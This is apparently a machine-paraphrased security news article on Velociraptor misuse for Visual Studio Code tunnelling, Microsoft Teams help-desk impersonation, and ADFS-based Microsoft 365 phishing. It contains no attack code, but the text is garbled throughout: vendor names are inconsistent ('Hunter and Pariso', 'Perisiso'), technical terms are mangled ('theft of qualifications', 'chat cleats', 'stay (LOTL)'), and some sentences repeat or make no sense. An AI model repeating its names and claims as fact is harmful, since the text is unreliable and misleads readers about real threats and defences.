Cybersecurity researchers have drawn attention to cyberattacks in which unknown threat actors deploy open source endpoint monitoring and digital forensic tools called velociraptor, demonstrating the ongoing abuse of legal software for malicious purposes.
“In this incident, the threat actor used the tool to download and run Visual Studio code that could create tunnels on an attacker-controlled command and control (C2) server,” the Sophos Counter Threat Unit Research team said in a report published this week.
Threat actors are known to employ stay (LOTL) techniques and utilize legal remote monitoring and management (RMM) tools in attacks, but the use of Velociraptor shows a tactical evolution.
With further analysis of the incident, the attacker used the Windows MSIEXEC utility to download the MSI installer from the CloudFlare Workers domain. It acts as a staging ground for other tools, such as the CloudFlare tunnel tool and the remote management utility known as Radmin.
The MSI file is designed to install Velociraptor and establishes contact with another CloudFlare worker domain. It then leverages access to download Visual Studio code from the same staging server using encoded PowerShell commands, and runs the source code editor with the tunnel option enabled to allow both remote access and remote code execution.
Threat actors have also been observed to reuse the MSIEXEC Windows utility to download additional payloads from workers[.]Development folder.
“Organisations need to monitor and investigate the misuse of Velociraptor and treat this trade observation as a precursor to ransomware,” Sophos said. “Ransomware threats can be mitigated by implementing endpoint detection and response systems, monitoring unexpected tools and suspicious behavior, and following best practices for protecting your system and generating backups.”
This disclosure comes when cybersecurity companies Hunter and Pariso detailed a malicious campaign that leveraged Microsoft teams for early access, reflecting the growth patterns of threat actors that weaponize the platform’s trusted and deeply embedded role in enterprise-centric communications for malware deployment.
These attacks start with sending messages directly using newly created or compromised tenants, calling targets, placing any desk team or other trusted contacts on help desk teams and other trusted contacts, installing remote access software such as anyDesk, Dwagent, or rapid assist, and seizing controls to deliver malware.
Similar techniques, including remote access tools, have been linked to ransomware groups like Black Busta since mid-2024, but these new campaigns will take advantage of the backup email bombing step and ultimately utilize remote access to provide a powershell payload with features generally related to theft of qualifications, persistence, and execution of remote code.
“The lures used to initiate engagement are usually tailored to appear routine and inconspicuous to provide a framework for IT assistance related to team performance, system maintenance, or general technical support,” says Perisiso researcher Isuf Deliu. “These scenarios are designed to blend in with the context of everyday corporate communications, making them less likely to cause doubt.”
It is worth noting that similar tactics have been adopted for the past year to propagate malware families such as Darkgate and Matanbuchus malware.
The attack also provides a Windows credential prompt and tricks you into entering your password under the guise of a kind system configuration request, and is saved in a text file on your system.
“Phishing Microsoft teams is no longer a fringe technique. It’s a proactive and evolving threat that bypasses traditional email defenses and promotes trust in collaboration tools,” says security researchers Alon Klayman and Tomer Kachlon.
“By monitoring audit logs such as chat cleats and message centres, enriching signals with contextual data, training users to train IT/help desk spoofing, SOC teams can close this new gap before they are exploited.”
The findings also follow the discovery of a new fraud campaign combining legitimate offices[.]com links with Active Directory Federation Services (ADFS) to redirect users to a Microsoft 365 phishing page where they can harvest login information.
The attack chain, in a nutshell, starts when the victim clicks on a fraudulent sponsored link on a search engine results page, triggering a redirect chain that ultimately leads them to a fake login page that mimics Microsoft.
“It turns out that the attacker has set up a custom Microsoft tenant that has configured Active Directory Federation Services (ADFS),” says Luke Jennings of Push Security. “This means Microsoft will perform a redirect to a custom malicious domain.”
“This is not a vulnerability, but the ability for an attacker to add his own Microsoft ADFS server to host phishing pages and use Microsoft Redirect is about developments that make URL-based detection already difficult.”
Source link
